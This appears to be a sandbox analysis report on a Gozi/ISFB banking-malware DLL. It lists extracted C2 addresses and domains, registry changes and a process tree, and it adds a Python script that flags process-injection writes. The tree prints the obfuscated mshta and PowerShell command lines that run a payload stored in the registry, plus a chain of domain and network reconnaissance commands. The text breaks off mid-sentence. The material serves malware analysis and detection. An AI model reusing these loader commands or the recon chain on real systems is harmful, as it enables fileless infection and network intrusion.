Analysis
-
max time kernel
151s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system -
submitted
03-08-2022 16:02
Static task
static1
Behavioral task
behavioral1
Sample
aa856dedda137f7419ecc36766ed74e3.dll
Resource
win7-20220715-en
General
-
Target
aa856dedda137f7419ecc36766ed74e3.dll
-
Size
300KB
-
MD5
aa856dedda137f7419ecc36766ed74e3
-
SHA1
59a685b1ddd500747678ed66ffdb1afadb7b8023
-
SHA256
9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f
-
SHA512
60dcb99e96369c32fc8330570021225575b01c3e7b4ecd42554d0b5dbca2796cdb86f93630b32c836892b67a3b50ff8b7594cff43d02a85f8822beb638011fff
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exe
Key value queried: \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation (process: mshta.exe)
-
Suspicious use of SetThreadContext 5 IoCs
Processes:
powershell.exe, Explorer.EXE
PID 4380 powershell.exe set thread context of 3116 Explorer.EXE
PID 3116 Explorer.EXE set thread context of 3576 RuntimeBroker.exe
PID 3116 Explorer.EXE set thread context of 3828 RuntimeBroker.exe
PID 3116 Explorer.EXE set thread context of 4552 RuntimeBroker.exe
PID 3116 Explorer.EXE set thread context of 1740 cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exe (3 instances)
2152 net.exe
1220 net.exe
824 net.exe
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exe
Process for every entry: RuntimeBroker.exe. Key prefix <KEY> = \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System. Path prefix <STAGED> = \\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets.
Set value (str) <KEY>\14adeb20-9741-4f42-
Set value (int) <KEY>\335a8887-fb30-4439- = "0"
Key deleted <KEY>\22030cd5-ea89-47c7-
Set value (int) <KEY>\95da6e11-69b9-4234- = "8324"
Set value (data) <KEY>\e79f10a1-5129-43d7- = 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
Key deleted <KEY>\7704976f-8a79-45c7-
Set value (data) <KEY>\8f628a72-0823-41d5- = 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
Set value (data) <KEY>\335a8887-fb30-4439- = a3b25a8b63a7d801
Set value (int) <KEY>\7704976f-8a79-45c7- = "8324"
Set value (data) <KEY>\f26f38b6-a9b8-4163- = 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
Set value (str) <KEY>\2669fe67-5a16-4185- = "<STAGED>\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8"
Set value (data) <KEY>\7704976f-8a79-45c7- = b1abff8163a7d801
Set value (data) <KEY>\7704976f-8a79-45c7- = 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
Key created <KEY>\fbfa43cf-0848-4c2f-
Set value (str) <KEY>\8f628a72-0823-41d5- = "<STAGED>\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474"
Set value (str) <KEY>\335a8887-fb30-4439-
Set value (str) <KEY>\f26f38b6-a9b8-4163- = "<STAGED>\\197bfdf98b90f1568047f539021597d317ed02a72fda0352cb78764413458770"
Set value (str) <KEY>\2669fe67-5a16-4185-
Set value (data) <KEY>\14adeb20-9741-4f42- = 7fdf2f8263a7d801
Set value (str) <KEY>\14adeb20-9741-4f42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"
Set value (str) <KEY>\fbfa43cf-0848-4c2f-
Set value (data) <KEY>\e79f10a1-5129-43d7- = cf34488b63a7d801
Key deleted <KEY>\c0eb29be-1c77-40e1-
Set value (int) <KEY>\8f628a72-0823-41d5- = "8324"
Set value (str) <KEY>\cc7c23c5-8053-49d2- = "<STAGED>\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b"
Set value (str) <KEY>\335a8887-fb30-4439- = "<STAGED>\\a49211c83afb11de1426666b7c241972cb34d99715d635879a6dcc7331aa299a"
Set value (str) <KEY>\e79f10a1-5129-43d7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"
Key deleted <KEY>\f64f1dc4-a930-4385-
Set value (str) <KEY>\8f628a72-0823-41d5-
Key created <KEY>\14adeb20-9741-4f42-
Set value (data) <KEY>\fbfa43cf-0848-4c2f- = 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
Key deleted <KEY>\37b82531-b0bf-420d-
Set value (int) <KEY>\22030cd5-ea89-47c7- = "0"
Set value (int) <KEY>\7704976f-8a79-45c7- = "0"
Set value (data) <KEY>\22030cd5-ea89-47c7- = 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
Set value (data) <KEY>\f26f38b6-a9b8-4163- = e41a908b63a7d801
Set value (data) <KEY>\2669fe67-5a16-4185- = 
0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000036601c8463a7d80167df968b63a7d80167df968b63a7d80117f519000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355969020006632643935
30653135623863383534393739663131343962363866393431636535616336326430396637636238336639346236343862336263623262396464380000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000d62b4a00660032006400390035003000650031003500620038006300380035003400390037003900660031003100340039006200360038006600390034003100630065003500610063003600320064003000390066003700630062003800330066003900340062003600340038006200330062006300620032006200390064006400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66326439353065313562386338353439373966313134396236386639343163653561633632643039663763623833663934623634386233626362326239646438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 
(process: RuntimeBroker.exe)
Remaining entries, process RuntimeBroker.exe throughout. Key prefix <KEY> = \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System. Path prefix <STAGED> = \\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets.
Set value (data) <KEY>\95da6e11-69b9-4234- = 5ae61e8263a7d801
Set value (int) <KEY>\14adeb20-9741-4f42- = "8324"
Set value (int) <KEY>\fbfa43cf-0848-4c2f- = "8324"
Set value (str) <KEY>\cc7c23c5-8053-49d2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"
Set value (str) <KEY>\e79f10a1-5129-43d7- = "<STAGED>\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474"
Key deleted <KEY>\14adeb20-9741-4f42-
Set value (str) <KEY>\8f628a72-0823-41d5- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"
Set value (int) <KEY>\22030cd5-ea89-47c7- = "8324"
Set value (str) <KEY>\22030cd5-ea89-47c7- = "<STAGED>\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b"
Set value (data) <KEY>\8a87cb30-55b8-4a12- = 737e398263a7d801
Set value (str) <KEY>\95da6e11-69b9-4234-
Set value (str) <KEY>\8a87cb30-55b8-4a12- = "<STAGED>\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8"
Key deleted <KEY>\8f628a72-0823-41d5-
Key deleted <KEY>\8a87cb30-55b8-4a12-
Key deleted <KEY>\95da6e11-69b9-4234-
Key deleted <KEY>\bfc5aaf5-2e5b-480b-
Set value (str) <KEY>\22030cd5-ea89-47c7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"
Key created <KEY>\8a87cb30-55b8-4a12-
Set value (str) <KEY>\8a87cb30-55b8-4a12-
Set value (data) <KEY>\14adeb20-9741-4f42- = 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
Set value (int) <KEY>\2669fe67-5a16-4185- = "8324"
Set value (int) <KEY>\8f628a72-0823-41d5- = "0"
Set value (data) <KEY>\22030cd5-ea89-47c7- = 41edf18163a7d801
Key created <KEY>\95da6e11-69b9-4234-
Set value (int) <KEY>\14adeb20-9741-4f42- = "0"
Set value (int) <KEY>\fbfa43cf-0848-4c2f- = "0"
Key created <KEY>\335a8887-fb30-4439-
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exe, powershell.exe, Explorer.EXE
4540 regsvr32.exe (2 entries)
4380 powershell.exe (2 entries)
3116 Explorer.EXE (60 entries)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXE
3116 Explorer.EXE
-
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exe, Explorer.EXE
4380 powershell.exe
3116 Explorer.EXE (4 entries)
-
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
powershell.exe, Explorer.EXE, WMIC.exe, RuntimeBroker.exe, tasklist.exe
Token: SeDebugPrivilege 4380 powershell.exe
Token: SeShutdownPrivilege 3116 Explorer.EXE
Token: SeCreatePagefilePrivilege 3116 Explorer.EXE
Tokens adjusted by 4188 WMIC.exe (this sequence of 21 appears twice, in the same order): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Token: SeShutdownPrivilege 3116 Explorer.EXE
Token: SeCreatePagefilePrivilege 3116 Explorer.EXE
Token: SeShutdownPrivilege 3576 RuntimeBroker.exe
Token: SeDebugPrivilege 3224 tasklist.exe
Token: SeShutdownPrivilege 3576 RuntimeBroker.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXE
3116 Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exe, mshta.exe, powershell.exe, csc.exe, csc.exe, Explorer.EXE, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe
Each line: source PID and process wrote to memory of target PID and process (repeat count in parentheses).
PID 3256 regsvr32.exe -> 4540 regsvr32.exe (x3)
PID 2952 mshta.exe -> 4380 powershell.exe (x2)
PID 4380 powershell.exe -> 864 csc.exe (x2)
PID 864 csc.exe -> 3588 cvtres.exe (x2)
PID 4380 powershell.exe -> 3228 csc.exe (x2)
PID 3228 csc.exe -> 4068 cvtres.exe (x2)
PID 4380 powershell.exe -> 3116 Explorer.EXE (x4)
PID 3116 Explorer.EXE -> 3576 RuntimeBroker.exe (x4)
PID 3116 Explorer.EXE -> 3828 RuntimeBroker.exe (x4)
PID 3116 Explorer.EXE -> 4552 RuntimeBroker.exe (x4)
PID 3116 Explorer.EXE -> 4244 cmd.exe (x2)
PID 3116 Explorer.EXE -> 1740 cmd.exe (x4)
PID 4244 cmd.exe -> 4188 WMIC.exe (x2)
PID 4244 cmd.exe -> 2148 more.com (x2)
PID 3116 Explorer.EXE -> 1740 cmd.exe (x2)
PID 3116 Explorer.EXE -> 4344 cmd.exe (x2)
PID 3116 Explorer.EXE -> 4208 cmd.exe (x2)
PID 4208 cmd.exe -> 3816 systeminfo.exe (x2)
PID 3116 Explorer.EXE -> 1092 cmd.exe (x2)
PID 3116 Explorer.EXE -> 832 cmd.exe (x2)
PID 832 cmd.exe -> 2152 net.exe (x2)
PID 3116 Explorer.EXE -> 4600 cmd.exe (x2)
PID 3116 Explorer.EXE -> 556 cmd.exe (x2)
PID 556 cmd.exe -> 2708 nslookup.exe (x2)
PID 3116 Explorer.EXE -> 5052 cmd.exe (x2)
PID 3116 Explorer.EXE -> 4296 cmd.exe (x2)
PID 4296
wrote to memory of 3224 4296 cmd.exe tasklist.exe
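Most of the WriteProcessMemory records above are benign in isolation: CreateProcess writes into the child it has just started, so cmd.exe writing into systeminfo.exe or csc.exe writing into cvtres.exe is expected. The rows that matter are the ones whose target is not the writer's child: powershell.exe (4380) writing into Explorer.EXE (3116), which in the process tree is its grandparent, and Explorer.EXE writing into the three top-level RuntimeBroker.exe instances (3576, 3828, 4552), which are not its descendants at all. The script below is an added example, not part of the sandbox's own analysis; it applies exactly that rule to the rows above, with the edge list and the parent map transcribed from this report. Keying on PID alone is a simplification the code comments on, since the report itself shows PIDs 864 and 4068 being reused.

```python
"""Spot cross-process memory writes whose target is not the writer's child.

Added example, not part of the sandbox report. The WRITES edges are the report's
WriteProcessMemory records, deduplicated; PARENT is the report's process tree.
"""

# (writer pid, writer image, target pid, target image), one entry per distinct pair
WRITES = [
    (3256, "regsvr32.exe", 4540, "regsvr32.exe"),
    (2952, "mshta.exe", 4380, "powershell.exe"),
    (4380, "powershell.exe", 864, "csc.exe"),
    (864, "csc.exe", 3588, "cvtres.exe"),
    (4380, "powershell.exe", 3228, "csc.exe"),
    (3228, "csc.exe", 4068, "cvtres.exe"),
    (4380, "powershell.exe", 3116, "Explorer.EXE"),
    (3116, "Explorer.EXE", 3576, "RuntimeBroker.exe"),
    (3116, "Explorer.EXE", 3828, "RuntimeBroker.exe"),
    (3116, "Explorer.EXE", 4552, "RuntimeBroker.exe"),
    (3116, "Explorer.EXE", 4244, "cmd.exe"),
    (3116, "Explorer.EXE", 1740, "cmd.exe"),
    (4244, "cmd.exe", 4188, "WMIC.exe"),
    (4244, "cmd.exe", 2148, "more.com"),
    (3116, "Explorer.EXE", 4344, "cmd.exe"),
    (3116, "Explorer.EXE", 4208, "cmd.exe"),
    (4208, "cmd.exe", 3816, "systeminfo.exe"),
    (3116, "Explorer.EXE", 1092, "cmd.exe"),
    (3116, "Explorer.EXE", 832, "cmd.exe"),
    (832, "cmd.exe", 2152, "net.exe"),
    (3116, "Explorer.EXE", 4600, "cmd.exe"),
    (3116, "Explorer.EXE", 556, "cmd.exe"),
    (556, "cmd.exe", 2708, "nslookup.exe"),
    (3116, "Explorer.EXE", 5052, "cmd.exe"),
    (3116, "Explorer.EXE", 4296, "cmd.exe"),
    (4296, "cmd.exe", 3224, "tasklist.exe"),
]

# child pid -> parent pid, from the process tree. Explorer.EXE (3116) and the
# RuntimeBroker.exe instances are top-level entries, so they have no parent here.
# Keyed by pid only because that is all the report gives; a real detector keys on
# (pid, creation time), since the report shows pids 864 and 4068 being reused.
PARENT = {
    3256: 3116, 4540: 3256, 2952: 3116, 4380: 2952, 864: 4380, 3588: 864,
    3228: 4380, 4068: 3228, 4244: 3116, 4188: 4244, 2148: 4244, 1740: 3116,
    4344: 3116, 4208: 3116, 3816: 4208, 1092: 3116, 832: 3116, 2152: 832,
    4600: 3116, 556: 3116, 2708: 556, 5052: 3116, 4296: 3116, 3224: 4296,
}


def ancestors(pid, parent):
    """Yield parent, grandparent, ... of pid until a top-level process is reached."""
    seen = set()
    while pid in parent and pid not in seen:
        seen.add(pid)
        pid = parent[pid]
        yield pid


def classify(writer, target, parent):
    """'child' is the normal CreateProcess case; anything else is worth a look."""
    if parent.get(target) == writer:
        return "child"
    if target in set(ancestors(writer, parent)):
        return "ancestor"
    return "unrelated"


def find_injection_writes(writes, parent):
    """Return every write whose target is not the writer's child, with the relation."""
    return [
        (src, src_img, dst, dst_img, classify(src, dst, parent))
        for src, src_img, dst, dst_img in writes
        if classify(src, dst, parent) != "child"
    ]


if __name__ == "__main__":
    for src, src_img, dst, dst_img, rel in find_injection_writes(WRITES, PARENT):
        print(f"{src_img} ({src}) -> {dst_img} ({dst}): {rel}")
```

Run against this report the rule yields four findings: the powershell.exe write into its ancestor Explorer.EXE, and the three Explorer.EXE writes into unrelated RuntimeBroker.exe processes. The same processes carry the SetThreadContext and MapViewOfSection markers in the tree, which is what you would expect when a written-to process is then made to execute the payload.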
Processes
-
Depth is shown in brackets; each process is a child of the nearest entry above it with the next lower depth.

[1] C:\Windows\System32\RuntimeBroker.exe  (PID 3576)
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\RuntimeBroker.exe  (PID 3828)
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

[1] C:\Windows\Explorer.EXE  (PID 3116)
    cmdline: C:\Windows\Explorer.EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\regsvr32.exe  (PID 3256)
        cmdline: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\regsvr32.exe  (PID 4540)
            cmdline: /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
            - Suspicious behavior: EnumeratesProcesses

    [2] C:\Windows\System32\mshta.exe  (PID 2952)
        cmdline: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lp3h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lp3h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4380)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name muwvla -value gp; new-alias -name pimbks -value iex; pimbks ([System.Text.Encoding]::ASCII.GetString((muwvla "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 864)
                cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.cmdline"
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 3588)
                    cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES256A.tmp" "c:\Users\Admin\AppData\Local\Temp\xr5mce2s\CSC1396718FD4E48259285D1476762AD99.TMP"

            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 3228)
                cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline"
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 4068)
                    cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2683.tmp" "c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP"

    [2] C:\Windows\system32\cmd.exe  (PID 4244)
        cmdline: cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\Wbem\WMIC.exe  (PID 4188)
            cmdline: wmic computersystem get domain
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\more.com  (PID 2148)
            cmdline: more

    [2] C:\Windows\syswow64\cmd.exe  (PID 1740)
        cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

    [2] C:\Windows\system32\cmd.exe  (PID 4344)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 4208)
        cmdline: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\systeminfo.exe  (PID 3816)
            cmdline: systeminfo.exe
            - Gathers system information

    [2] C:\Windows\system32\cmd.exe  (PID 1092)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 832)
        cmdline: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\net.exe  (PID 2152)
            cmdline: net view
            - Discovers systems in the same network

    [2] C:\Windows\system32\cmd.exe  (PID 4600)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 556)
        cmdline: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\nslookup.exe  (PID 2708)
            cmdline: nslookup 127.0.0.1

    [2] C:\Windows\system32\cmd.exe  (PID 5052)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 4296)
        cmdline: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\tasklist.exe  (PID 3224)
            cmdline: tasklist.exe /SVC
            - Enumerates processes with tasklist
            - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\system32\cmd.exe  (PID 2916)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 4680)
        cmdline: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

        [3] C:\Windows\system32\driverquery.exe  (PID 864)
            cmdline: driverquery.exe

    [2] C:\Windows\system32\cmd.exe  (PID 4068)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 4928)
        cmdline: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

        [3] C:\Windows\system32\reg.exe  (PID 2092)
            cmdline: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

    [2] C:\Windows\system32\cmd.exe  (PID 4836)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 3196)
        cmdline: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

        [3] C:\Windows\system32\net.exe  (PID 2788)
            cmdline: net config workstation

            [4] C:\Windows\system32\net1.exe  (PID 4040)
                cmdline: C:\Windows\system32\net1 config workstation

    [2] C:\Windows\system32\cmd.exe  (PID 4324)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 1668)
        cmdline: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

        [3] C:\Windows\system32\nltest.exe  (PID 3996)
            cmdline: nltest /domain_trusts

    [2] C:\Windows\system32\cmd.exe  (PID 4348)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 4564)
        cmdline: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

        [3] C:\Windows\system32\nltest.exe  (PID 4860)
            cmdline: nltest /domain_trusts /all_trusts

    [2] C:\Windows\system32\cmd.exe  (PID 1856)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 2688)
        cmdline: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

        [3] C:\Windows\system32\net.exe  (PID 1220)
            cmdline: net view /all /domain
            - Discovers systems in the same network

    [2] C:\Windows\system32\cmd.exe  (PID 2424)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 2196)
        cmdline: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

        [3] C:\Windows\system32\net.exe  (PID 824)
            cmdline: net view /all
            - Discovers systems in the same network

    [2] C:\Windows\system32\cmd.exe  (PID 4396)
        cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

    [2] C:\Windows\system32\cmd.exe  (PID 3776)
        cmdline: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\343A.bin1 > C:\Users\Admin\AppData\Local\Temp\343A.bin & del C:\Users\Admin\AppData\Local\Temp\343A.bin1"

[1] C:\Windows\System32\RuntimeBroker.exe  (PID 4552)
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
    - Modifies registry class
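The tree reads as two stages. First the loader: the 64-bit regsvr32.exe is handed the DLL with /s and re-launches the SysWOW64 copy, which is what regsvr32 does for a 32-bit DLL; mshta.exe is then started with an inline about:<hta:application> document whose only job is to eval() a script stored in the registry under HKCU\Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974 (the ManagerMemory value); that script starts powershell.exe, which aliases iex and runs the ProcessOptions value from the same key, compiles C# on the fly (the csc.exe and cvtres.exe children with random-named .cmdline files are what Add-Type produces) and injects into Explorer.EXE. Nothing of the second stage is on disk: the script lives in the registry and the code runs inside Explorer. Second the host survey, run from Explorer.EXE as a sequence of cmd /C wrappers: wmic computersystem get domain, systeminfo, net view, nslookup 127.0.0.1, tasklist /SVC, driverquery, the Uninstall registry key, net config 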